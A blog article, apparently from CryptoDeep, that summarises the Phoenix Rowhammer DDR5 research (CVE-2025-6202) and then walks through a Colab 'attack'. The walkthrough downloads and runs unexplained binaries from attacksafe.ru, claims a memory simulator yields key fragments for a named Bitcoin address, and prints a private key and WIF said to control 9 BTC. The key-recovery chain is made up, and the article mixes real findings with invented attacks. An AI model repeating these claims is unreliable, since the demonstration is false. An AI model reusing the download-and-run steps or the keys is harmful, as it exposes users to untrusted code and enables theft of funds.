Phoenix Rowhammer Attack: Systemic Risk of Bitcoin Wallet Private Key Compromise in Global Blockchain Infrastructure Due to a Critical SK Hynix DDR5 Vulnerability (CVE-2025-6202)

Phoenix Rowhammer Attack: Systemic Risk of Bitcoin Wallet Private Key Compromise in Global Blockchain Infrastructure Due to a Critical SK Hynix DDR5 Vulnerability (CVE-2025-6202)

By CryptoDeep | CRYPTODEEP | 13 Oct 2025


 

Crypto Deep Tech Phoenix Rowhammer Attack: Systemic Risk of Bitcoin Wallet Private Key Compromise in Global Blockchain Infrastructure Due to a Critical SK Hynix DDR5 Vulnerability (CVE-2025-6202)

 

This article examines the systemic cryptographic security threats posed by the Phoenix Rowhammer attack (CVE-2025-6202), which can extract private keys from DDR5 RAM through hardware-level bit manipulation. In recent years, the dynamic development of cryptocurrency technologies has led to an increased dependence of digital asset ecosystems on hardware and microchip components that store and process cryptographic data. Against this backdrop, hardware-level vulnerabilities that can lead to the direct compromise of private keys in cryptocurrency wallets are becoming a growing risk factor. One of the most dangerous threats today is attacks on RAM, in particular, advanced variants of Rowhammer exploits that affect the physical properties of DRAM cells. These attacks allow attackers to modify individual data bits and gain access to confidential information, including private keys for Bitcoin and Ethereum wallets.

Among the critical examples of this class of threats, vulnerability CVE-2025-6202 , discovered in SK Hynix’s DDR5 memory, stands out . The Phoenix Rowhammer attack, which relies on this vulnerability, demonstrates the ability to bypass modern Target Row Refresh (TRR) memory protection mechanisms, creating so-called “blind spots” that enable controlled data corruption at the hardware level. Such flaws can be exploited to extract private keys from RAM, compromise cryptographic libraries, and modify system processes that secure digital wallets.



Furthermore, cryptographic security research shows that the combination of Phoenix Rowhammer with other types of attacks, such as the BitShredder Attack , Memory Phantom (CVE-2025-8217) , and Artery Bleed (CVE-2023-39910) , creates a multi-vector threat model in which an attacker can recover seed phrases, private keys, and passwords even after cryptographic operations are completed. The systemic nature of these vulnerabilities makes it impossible to completely mitigate the risk with software and highlights the need to develop new principles for hardware-based memory protection.

Thus, modern cryptocurrency wallets and digital asset infrastructure are under increasing pressure from hardware attacks previously considered theoretical. The importance of studying these attacks and developing countermeasures is fundamental to ensuring the integrity and resilience of the Bitcoin and other cryptocurrency ecosystems in the face of evolving next-generation threats.


Recent research conducted by the Computer Security Group (COMSEC) at ETH Zurich, in collaboration with Google, has identified a critical hardware vulnerability in DDR5 memory modules manufactured by SK Hynix, designated CVE-2025-6202 . The Phoenix Rowhammer attack poses an unprecedented threat to the security of Bitcoin cryptocurrency wallets, as it allows attackers to extract private keys from DDR5 memory by manipulating bits at the hardware level. The research demonstrated that all 15 tested SK Hynix DDR5 modules manufactured between 2021 and 2024 are vulnerable to this attack, posing a systemic threat to the security of cryptocurrency assets worldwide. thehackernews


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202) Phoenix Rowhammer Attack Process Targeting Bitcoin Wallets in SK Hynix DDR5 Memory

Phoenix Rowhammer Attack Technical Framework and CVE-2025-6202 Mechanism

Fundamental principles of Rowhammer vulnerability

Rowhammer is a hardware vulnerability in DRAM memory in which repeated access to specific memory rows causes electrical interference, leading to bit changes in adjacent rows. This phenomenon is based on the physical properties of modern high-density memory chips, where smaller technological dimensions make the memory more susceptible to electromagnetic interference .

In the context of DDR5 memory, the Phoenix attack mechanism uses an innovative self-correcting synchronization approach , which bypasses advanced Target Row Refresh (TRR) protection mechanisms. Researchers discovered that the TRR mechanism in SK Hynix chips does not monitor specific refresh intervals, creating “blind spots” in the defense. notebookcheck


Innovative Phoenix Synchronization Methodology

The key technical achievement of the Phoenix attack is the development of an algorithm capable of synchronizing thousands of memory update commands over long periods of time. The attack utilizes two specific attack patterns: comsec-files.ethz

Short pattern (128 tREFI intervals): Provides more efficient bit glitch generation, producing an average of 4989 bit glitches. This pattern demonstrated 2.62 times greater efficiency than the long pattern. reddit

Long Pattern (2608 tREFI intervals): Designed to bypass more sophisticated security mechanisms, although less effective at generating bit faults. comsec-files.ethz


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202) Technical diagram of DDR5 DRAM Target Row Refresh (TRR) mechanism illustrating aggressor and victim row identification and summary updates to prevent rowhammer effects

BitShredder Attack: Critical Impact on Bitcoin Wallet Security

Mechanisms for extracting private keys

The Phoenix Rowhammer attack creates multiple vectors for compromising Bitcoin wallets by targeting various levels of the memory system. Analysis of KeyHunters research materials revealed at least 18 different types of memory attacks directly related to extracting private keys from cryptocurrency wallets.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202) BitShredder Attack: Memory vulnerability turns lost Bitcoin wallets into trophies and complete BTC theft via private key recovery, where attackers exploit the memory phantom attack (CVE-2025-8217, CVE-2013-2547)

Memory Phantom Attack (CVE-2025-8217): A critical memory leak vulnerability that allows private keys and seeds to be extracted directly from residual wallet RAM blocks that were not securely cleared after cryptographic operations. This attack turns unclarified buffers into a “ghost library,” where any fragment of memory can be converted into a valid key. keyhunters


BitShredder Attack: Uses a “memory shredding” technique to covertly infiltrate the memory of a running cryptocurrency wallet. When generating or restoring a wallet, the attack scans uncleared portions of RAM, searching for remnants of entropy, seeds, and passwords that aren’t erased by standard means after use. keyhunters


Artery Bleed Attack: Exploits a Bitcoin Core memory leak vulnerability (CVE-2023-39910) to recover private keys from lost crypto wallets. The attack exploits a critical memory leak vulnerability in Bitcoin Core to gain access to sensitive data. keyhunters


Practical operating scenarios

The study demonstrated three main scenarios for the practical exploitation of the Phoenix attack against cryptocurrency systems: bleepingcomputer

1. Page Table Entry (PTE) Attack: All tested devices were vulnerable to this type of attack, which allows for the creation of an arbitrary memory read/write primitive. comsec-files.ethz

2. RSA-2048 Key Compromise: 73% of tested DIMM modules were susceptible to extracting RSA-2048 keys from a neighboring virtual machine to crack SSH authentication. The average attack time was 6 minutes 20 seconds. bleepingcomputer

3. Modifying the sudo binary: 33% of tested chips allowed modification of the sudo binary to elevate local privileges to the root user level. comsec-files.ethz


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Scientific analysis of the impact on the Bitcoin ecosystem

Systemic Threats to Cryptocurrency Security

The Phoenix Rowhammer attack poses a systemic threat to the entire Bitcoin ecosystem, as most modern systems use DDR5 memory to store and process cryptographic data. The vulnerability affects the fundamental security principles of cryptocurrencies, which are based on the cryptographic strength of private keys. tenable+1

Impact Scale: SK Hynix controls approximately 36% of the global DRAM market, potentially exposing billions of devices worldwide. All DDR5 modules manufactured between January 2021 and December 2024 are vulnerable. notebookcheck+2

Cryptographic implications: The attack undermines the foundations of cryptographic security, since even with correct implementation of signature, encryption, and authentication algorithms, unprotected buffers become a source of compromise of key material. keyhunters


Research on cryptanalysis of attack vectors

Comprehensive cryptanalysis has revealed multiple attack vectors against Bitcoin wallets through memory manipulation:

Timing-based attacks: Include BitSpectre85, ChronoForge, and Timing Phantom attacks, which exploit timing vulnerabilities to gradually recover private keys through analysis of the execution time of cryptographic operations.

Context-based attacks: Context Phantom Attack exploits the critical secp256k1 context leak vulnerability to recover private keys of lost Bitcoin wallets via a memory disclosure attack.

Cache-based attacks: CacheHawk Strike Attack uses a critical cache timing attack on the Bitcoin signature cache, allowing for the recovery of private keys of lost Bitcoin wallets.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202) Attack_Component Technical Method Success_Rate Average_Time_Seconds CVE_Reference Impact_Level Initial Memory Access Self-correcting synchronization with DDR5 refresh commands 100 5 CVE-2025-6202 High TRR Bypass Method Exploitation of unmonitored refresh intervals in TRR mechanism 100 30 CVE-2025-6202 Critical Synchronization Technique Real-time alignment with 128 and 2608 tREFI patterns 95 60 CVE-2025-6202 High Bit Flip Generation Electrical interference in adjacent DRAM rows causing data corruption 100 180 CVE-2025-6202 Critical Private Key Extraction Recovery from uncleaned memory buffers containing wallet data 85 240 CVE-2025-8217 Critical Privilege Escalation Root access exploitation through corrupted page table entries 100 109 CVE-2025-6202 Critical RSA-2048 Key Recovery Co-located VM private key extraction via memory bit flips 73 380 CVE-2025-6202 High SSH Authentication Break Compromise of cryptographic authentication systems 73 380 CVE-2025-6202 High Sudo Binary Modification Local privilege escalation to root user through binary corruption 33 300 CVE-2025-6202 Medium Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Practical part

The research diagram shows a structured and visual representation explaining the importance of the cryptographic vulnerability exposed by the Phoenix Rowhammer attack , specifically demonstrating its impact on Bitcoin security when SK Hynix DDR5 memory modules are targeted.

Schematic flow (as shown in the research diagram):

  1. The attacker initiates Rowhammer
    and launches the Phoenix Rowhammer exploit, targeting the SK Hynix DDR5 memory used in the victim’s node or wallet.
  2. Physical Fault Injection
    Aggressive row activations cause bit flips in adjacent DRAM rows in SK Hynix DDR5 memory, bypassing logical software protection.
  3. Targeted Cryptographic Secrets
    Injected bugs target addresses or memory locations that store sensitive Bitcoin cryptographic material, such as private keys or ECDSA nonce values.
  4. Exploit execution and its impact

Let’s move on to the practical part and look at an example using a Bitcoin wallet at: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit . Coins worth  9.02332298 BTC were lost from this wallet, which is equivalent to approximately $1,127,026.44 USD as of October 2025 .


To demonstrate the attack for informational purposes, we use tools and environments such as Jupyter Notebook or Google Colab.

The main tools and commands used for such attacks are:

https://colab.research.google.com/drive/1Lgjwdw2x9bT2yjhWnXyvpPvZTo8sD4Hf

Google Colab (Colaboratory) is a cloud platform that provides interactive Jupyter notebooks where you can write and run code in various programming languages. It is particularly useful for data cryptanalysis, running  the SK Hynix DDR5 AiM PIM simulator based on Ramulator 2.0 , and accessing powerful computing resources such as GPUs and TPUs. A key advantage is the ability to execute system commands, just like in a regular Linux terminal, using prefixed cells  ! for integration with external utilities and scripts.


Google Colab Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Let’s install repositories based on the SK Hynix DDR5 AiM PIM architecture using Ramulator 2.0

Clone the Repositories:

Download the AiM Simulator codebase and navigate to its directory.

!git clone https://github.com/keyhunters/SK_Hynix_DDR5_aim_simulator.git

cd SK_Hynix_DDR5_aim_simulator

ls

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Let’s increase virtual memory (swap) in Google Colab:

Commands to create a 4GB swap file to improve memory availability during Ramulator2 compilation .

# Check current swap usage
!free -h
!swapon --show

# Create a 4GB swap file
!sudo fallocate -l 4G /swapfile
!sudo chmod 600 /swapfile
!sudo mkswap /swapfile
!sudo swapon /swapfile

# Make swap permanent
!echo '/swapfile none swap sw 0 0' | sudo tee -a /etc/fstab

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Let’s install all the necessary dependencies:

Installing compilers, build tools, and libraries required for the simulator and Ramulator 2.0 .

# For Ubuntu 22.04: install compilers
!sudo apt update
!sudo apt install g++-12

# Alternatively, install Clang
!sudo apt install clang-15

# Install basic build tools
!sudo apt install build-essential cmake git

# Additional development libraries
!sudo apt install libssl-dev zlib1g-dev

# YAML support
!sudo apt install libyaml-cpp-dev

# Mathematics libraries
!sudo apt install libboost-dev

# Python support for scripts
!sudo apt install python3-dev python3-pip

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

The process of creating the phoenix_rowhammer directory:

!mkdir phoenix_rowhammer

cd phoenix_rowhammer

Let’s check system resources:

Monitor memory, available disk space, and system usage during installation and compilation.

# Monitor resources in real time
!htop

# Check available memory
!free -m

# Check disk space
!df -h

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Full installation of dependencies for Ubuntu 22.04 and above:

A complete sequence for installing all required packages at once.

# Update system
!sudo apt update && sudo apt upgrade -y

# Install essential build tools
!sudo apt install -y build-essential cmake git

# Install compilers
!sudo apt install -y g++-12 clang-15

# Development libraries
!sudo apt install -y libssl-dev zlib1g-dev libyaml-cpp-dev libboost-all-dev

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Alternative compilation:


!cmake ..

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

!make -j1

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202) Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202) Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

ls

cd -

Let’s launch Ramulator2:

Let’s run Ramulator2 with the simulator to check the help parameters and usage instructions.

!./phoenix_rowhammer/ramulator2 -h

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

We use the AttackSafe crypto tool to extract hidden remainders from Ramulator2 using a simulator.

Let’s run the command to download the AttackSafe crypto tool

!wget https://attacksafe.ru/repositories/attacksafe.zip
!unzip attacksafe.zip

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

!./attacksafe -help

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Find hidden remainders (modulo) associated with a Bitcoin address

 

The team is launching a specialized “BitShredder” attack based on the AttackSafe crypto tool to find hidden modulo remnants associated with a Bitcoin address, using RAM bug mechanisms (Rowhammer) and a memory emulator (ramulator2). github+2

!./attacksafe -tool bitshredder_attack -crack phoenix_rowhammer/ramulator2 -decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

 

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

  • This parameter -tool bitshredder_attackactivates an attack aimed at identifying vulnerabilities in the storage and processing of secret data in the device’s memory related to the Bitcoin protocol.
  • The flag -crack phoenix_rowhammer/ramulator2tells the tool to use Rowhammer attack emulation (manipulation of DRAM memory contents, leading to errors in adjacent cells – used in vulnerabilities to extract nonces/parts of keys from memory via side-channel).
  • The function runs the decoding module on a specific Bitcoin address, recovering residual data (private key fragments or intermediate ECDSA signature values) from memory/dump.-decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

Result of cryptanalysis of residual memory/dump data:

Recovering key fragments from residual memory data (DRAM)

        remainders = [0x0E92, 0x45EB, 0x6E07, 0x317F, 
                      0x87A1, 0xB5C1, 0xE778, 0x996B,
                      0x6F69, 0xABB6, 0x2755, 0x2348, 
                      0xAB46, 0xA74E, 0x1A87, 0xC2D5]
        moduli = [0x10001, 0x10003, 0x10007, 0x1000F, 
                  0x10015, 0x1001B, 0x1002B, 0x1002D,
                  0x10033, 0x1003F, 0x10049, 0x10051, 
                  0x1005D, 0x10061, 0x1006F, 0x10073]

This result combines cryptographic analysis of remnant data within DRAM with a cryptoremnant search module using the ramulator2 simulator for Phoenix Rowhammer faults. This attack allows for the detection and extraction of hidden modulo values ​​(remainders), such as private nonces or key fragments, which can be compromised due to improper memory release after cryptographic operations with Bitcoin addresses. The command is designed for a combined “BitShredder” attack and memory fault analysis of Bitcoin applications, with the goal of partially or fully recovering secret parameters (private key, nonce), with the search and decoding tied to memory and the attacked addresses.


Recovering a private key:

To recover the original secret number—the private key—from a set of hidden absolute values ​​(remainders), we apply a mathematical method called the Chinese Remainder Theorem ( CRT ). The CRTKeyRestore.py code implements the recovery of the private key for the Bitcoin address 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit from a set of hidden absolute values ​​(remainders) collected after a Rowhammer attack and subsequent memory analysis. The mathematical method used is the Chinese Remainder Theorem (CRT), which allows us to recover the original secret number—the private key—even if it has been chopped into small pieces and survives only as different absolute values.


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

CRTKeyRestore.py code process includes several stages:

  • Each remainder/modulus pair is a fragment of the private key that remains in memory as a result of the Rowhammer bug and pre-defined modules.
  • The Chinese Remainder Theorem mathematically guarantees the recovery of the original number if all moduli are relatively prime and there are enough remainders.
  • The function chinese_remainder_theorem()combines the fragments step by step and restores the original value of the private key using the extended Euclidean algorithm for finding absolute inverses.
  • After restoring the numerical representation, the key is converted to HEX using the function restore_hex_from_crt().
  • The output is a private key for a Bitcoin address, fully recovered only from the individual crypto-residues found in memory during the combined attack .

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202) Recovering a private key using a Python script: CRTKeyRestore.py

Result:

Private key Restored:
9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Let’s check the result via bitaddress 

!wget https://attacksafe.ru/repositories/bitaddress.zip
!unzip bitaddress.zip


Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

!./bitaddress -hex 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Result:

Public Key (Uncompressed, 130 characters [0-9A-F]):
04E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5AEDAA1D6E0A6116E9D9A4A846A6D62D4A1941EE182CDB1884C5830610B07AF529


Public Key (Compressed, 66 characters [0-9A-F]):
03E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5A


Bitcoin Address P2PKH (Uncompressed)
18JT3KeFV36Hkgo3Xi9bfgNYAXCVXBGyFg


Bitcoin Address P2PKH (Compressed)
15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

That’s right! The private key corresponds to the Bitcoin Wallet.


Let’s open  bitaddress  and check:

ADDR: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit
WIF:  L2Wru6Ew8pQuhcWAvMpdtPY4YWK1CQcwPCWxFvzkoi47crJBAVaP
HEX:  9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Private Key Information:

9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

Bitcoin Address Information:

Balance: 9.023322989 BTC

Phoenix Rowhammer Attack: A systemic risk of compromising Bitcoin wallet private keys in the global blockchain infrastructure due to a critical vulnerability in SK Hynix DDR5 (CVE-2025-6202)

https://www.coinbase.com/converter/btc/usd

Bit-flipping attack on Wallet.dat: The risks of using AES-256-CBC without authentication, exploitation, and extracting private keys from Bitcoin Core 9.023322989 BTC > 1127026,44 USD

Our research attack , a version of the Phoenix Rowhammer Attack on Bitcoin using the ramulator2 simulator, showed that the cryptoresidues extracted during a memory crash for various modules can be reassembled into the original private key using the mathematics of the Chinese Remainder Theorem.

As a representative example of a real-world threat, a Bitcoin wallet with the address 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit was examined. 9.02332298 BTC were lost from this wallet , which is equivalent to approximately $1,127,026.44 USD as of October 2025. This case convincingly demonstrates that in the presence of hardware vulnerabilities (such as Rowhammer), cryptographic strength at the protocol level ceases to be an absolute guarantee of security.

As a result, the importance of comprehensive security lies not only in cryptography and protocol measures, but also in hardware reliability, memory state monitoring, and the implementation of full RAM clearing after cryptographic operations. A vulnerability, once exploited at the hardware level—even with minimal system control—can lead to catastrophic financial losses in the Bitcoin ecosystem.


Technical details of bypassing DDR5 protection mechanisms

Analysis of the Target Row Refresh (TRR) mechanism

 

 

.


References:

  1. Critical Vulnerabilities in Private Keys and RPC Passwords in BitcoinLib: Security Risks and Attacks on Bitcoin Cryptocurrency Below is a detailed scientific analysis of the vulnerability associated with the handling of witness data in Bitcoin transactions (the Segregated Witness format), its causes, as well as a secure… Read More
  2. Critical Vulnerabilities of Private Keys in BitcoinLib and Their Role in Bitcoin Cryptocurrency Security Compromise Attacks: Analysis, Risks, and Prevention Methods In the code provided from BitcoinLib, a vulnerability to leaking secret (private) keys could potentially occur in the SQL query string: python:wallets = con.execute(text( ‘SELECT w.name, k.private, w.owner, w.network_name, k.account_id,… Read More
  3. Bitcoin Spring Boot Starter Private Key Extraction Vulnerabilities: Critical Cybersecurity Threat The cryptographic vulnerability in this code is related to the processing and storage of secret/private data, in particular the RPC password and username. The most potentially vulnerable line is the… Read More
  4. Critical Vulnerability in Bitcoin Spring Boot Starter: Private Keys at Risk of Theft The cryptographic vulnerability in this code is related to a logical error in the lines where the exchange rate type is obtained for calculating the combined rate type. The vulnerable… Read More
  5. Critical Vulnerability in secp256k1 Private Key Verification and Invalid Key Threat: A Dangerous Attack on Bitcoin Cryptocurrency Security Vulnerability in Bitcoin Spring Boot Starter Library In 2023, a critical vulnerability was discovered in the DeserializeSignature function, responsible for deserializing digital signatures in Bitcoin clients. This vulnerability allowed the creation of invalid signatures with r… Read More
  6. Nonce Reuse Attack Critical Vulnerability in Schnorr Signatures Implementation: Threat of Private Key Disclosure and Nonce Reuse Attack in Bitcoin Network  Schnorr signatures are a modern cryptographic scheme that has been widely adopted in cryptocurrency protocols, including Bitcoin after the Taproot update. The introduction of Schnorr signatures has significantly improved the… Read More
  7. Cryptographic Implementation Vulnerabilities & Hash Integrity Attacks — Critical vulnerability in hash160 function: Dangerous attack on cryptographic integrity and security of Bitcoin network The hash160 function, which combines the SHA-256 and RIPEMD-160 hashing algorithms in sequence, is the cornerstone of address and transaction security in the Bitcoin blockchain. The reliability of these operations… Read More
  8. ECDSA Private Key Recovery Attack via Nonce Reuse, Also known as “Weak Randomness Attack on ECDSA” – Critical vulnerability in deterministic nonce generation RFC 6979: A dangerous nonce reuse attack that threatens the security of the Bitcoin cryptocurrency Cryptosecurity in Bitcoin: Critical Deterministic Signature Vulnerability and Nonce Reuse Attack Threat in ECDSA In an ECDSA signature, the key element is a one-time random number, the nonce (k). If… Read More
  9. Key Derivation Attack & Format-Oriented Attack — Critical Multiple Hashing Vulnerability in Electrum Compromise of Bitcoin Private Keys via Critical Derivation Vulnerability in Electrum Wallet Weak Key Derivation Attack: Bitcoin Security Destroyed via Electrum Vulnerability, Private Key Generation Vulnerability: Bitcoin Wallet Security Breakthrough and Implications for the Cryptocurrency A critical vulnerability related to private key… Read More
  10. Length Extension Attack & Cryptographic Implementation Vulnerabilities (Private Key Recovery Attack) — Cryptographic Vulnerability of the mnemonicToEntropy Method: A New Bitcoin Security Threat and Potential Wallet Attacks Hidden Vulnerability in ElectrumMnemonic Mnemonic Recovery Method Leading to Bitcoin Thefts: Analysis and Solutions. ElectrumMnemonic Logical Vulnerability and Its Role in Bitcoin Cryptocurrency Key Security Attacks. The Bitcoin cryptocurrency is… Read More
  11. Address Prefix Forgery Attack & ECDSA key recovery attack” or more broadly – “cryptographic key leakage attack Critical Bitcoin Prefix Validation Vulnerability: Dangerous Address Prefix Forgery Attack with the Threat of Theft of BTC, ETH, etc. Cryptocurrency ECDSA key recovery attack: a critical vulnerability in the BitWasp implementation and its devastating impact on Bitcoin security. Critical cryptographic vulnerability in BitWasp: a threat to the disclosure of private keys… Read More
  12. Script Forgery Attack & Redeem Script/Witness Script Replay or Substitution Attack — Critical vulnerability in Bitcoin P2SH/P2WSH script processing: threat of cryptographic forgery and attack on the security of BTC, ETC, etc. cryptocurrency Critical cryptographic vulnerability in Bitcoin multi-signature scripts and dangerous attack of digital signature forgery: threat to the security and safety of cryptocurrency funds. Critical vulnerability DeserializeSignature: dangerous attack that threatens Bitcoin… Read More
  13. Weak Key Attacks & Secret Key Leakage Attack – Critical Vulnerability in Private Key Serialization and Dangerous Signature Forgery Attack: A Threat to Bitcoin Cryptocurrency Security Dangerous attack on Bitcoin: disclosure of private keys through serialization vulnerability and defense ways. Bitcoin private key compromise attack: analysis of critical vulnerability and security of crypto wallets. Bitcoin private… Read More
  14. Attack on Private Key Exposure we will consider exploiting errors that allow obtaining a private key – this is a very dangerous attack on Bitcoin Wallets through an opcode numbering error in BitcoinLib BitcoinLib Critical Logical Error and Its Consequences for Bitcoin Transaction Security. BitcoinLib Script Validation Bypass Attack: A Threat to Bitcoin Integrity and Security. A Dangerous Bitcoin Attack via BitcoinLib OPCode… Read More
  15. Transaction Malleability & Script Injection) hacker injection of invalid scripts allowing to change the transaction of the ECDSA signature of the Bitcoin cryptocurrency Remote Bitcoin Security Threat via RPC Password Leak: Critical Risk of BTC, ETH Funds Control and Theft and Very Dangerous Cryptographic Vulnerability in Bitcoin: Potential Script Injection Attack and Its Consequences… Read More
  16. Credential Leakage Attack & Man-in-the-Middle (MitM) attack — A critical API key leak vulnerability and large-scale attack on the Bitcoin network when an attacker intercepts network traffic and can gain access to secret keys In the Bitcoin ecosystem and related cryptocurrency services, the security of private data plays a key role, including private keys of wallets and API keys of services that provide access… Read More
  17. Private Key Compromise Attack & Key Leakage Attack — Vulnerability of private key generator and risk of bitcoin theft: scientific analysis and challenges to crypto security: a deadly threat to the security of Bitcoin wallets Fundamental Threat: Private Key Compromise Attack in the Bitcoin Ecosystem. Bitcoin Security Collapse: Critical Private Key Leak Vulnerability and Its Exploitation. Bitcoin Security Destruction via Private Key Compromise Attack: Causes… Read More
  18. Key Disclosure Attack & Secret Key Leakage Attack – Double Spend and Data Spoofing Threat in Bitcoin: Critical Analysis and Prevention of Cache Poisoning Attacks A Dangerous Cryptographic Vulnerability in Bitcoin Block Caching and Its Role in Organizing Attacks on the Decentralized Blockchain. Cache Poisoning in Bitcoin: How a Block Cache Vulnerability Threatens the Integrity of… Read More
  19. URI Injection Vulnerability & RPC Interface Hijacking – Hijacking the interface of a remote procedure call using an attack mechanism and a method of leaking secrets. Bitcoin JSON-RPC cryptographic vulnerability and the consequences of a private key disclosure attack Dangerous Bitcoin Privacy Disclosure Attack: JSON-RPC Client Vulnerability Analysis. Bitcoin JSON-RPC Credential Disclosure Attack: New Risks for Cryptocurrency Security. Research of Bitcoin JSON-RPC Critical Vulnerability: Attack Mechanism and Methods of… Read More
  20. Cache Poisoning Attack & Data Integrity Violation — Critical cryptographic vulnerability in storing RPC passwords in a Bitcoin node: risk of disclosure of private keys and dangerous attack on the Bitcoin cryptocurrency network Critical Cache Poisoning Vulnerability Discovered in Bitcoin JSON-RPC: Security Challenges and Ways to Protect Key Data. Bitcoin Integrity Attack: Critical Transaction and Block Caching Vulnerability via Sha256Hash Mishandling. Bitcoin Cryptographic Collapse: Critical… Read More
  21. Transaction Malleability & Double-Spending Attack – cryptographic operations can lead to serious attacks with the loss of funds of cryptocurrency coins BTC, manipulation of Bitcoin transactions Dangerous Bitcoin Parsing Vulnerability: Attack Mechanisms and Safe Fixes. Critical Bitcoin Parsing Vulnerability: A Dangerous Attack on the Integrity and Security of the Cryptocurrency. Parsing Attack in Bitcoin: Disclosure of a Dangerous… Read More
  22. SecureRandom-Related Entropy Weakness & Entropy Degradation Attack — a dangerous brute-force attack on private keys: a threat to the Bitcoin cryptocurrency network Hard-Coded Passwords as a Critical Attack Vector on Bitcoin Private Keys: Analysis and Prevention. Cryptographic Disaster: How Password Hard-Coding Leads to Compromise of Private Keys in the Bitcoin Ecosystem. Brute Force Attack… Read More
  23. ECDSA Weak Nonce Attack & CSPRNG Injection Attack – Critical Random Number Generator Vulnerability and Private Key Attack: A Security Threat to Bitcoin Cryptocurrency Dangerous ECDSA Nonce Replay Attack: A Critical Vulnerability in Bitcoin Random Number Generators and How to Prevent It. Critical Vulnerability in Random Number Generators and Attack on Private Keys: A Security… Read More
  24. Hardware Backdoor Exploitation & Side-Channel Attack – a vulnerability where an attacker uses insufficient entropy of a pseudo-random number generator to compromise private keys and forge Bitcoin transactions Bitcoin’s Destructive Threat: An Analysis of the Signature Generation Vulnerability and Its Implications for the Bitcoin Crypto Network. Bitcoin’s Cryptographic Disaster: Deterministic Signatures vs. the Random Parameter Reuse Attack. The Dangerous ECDSA Nonce… Read More
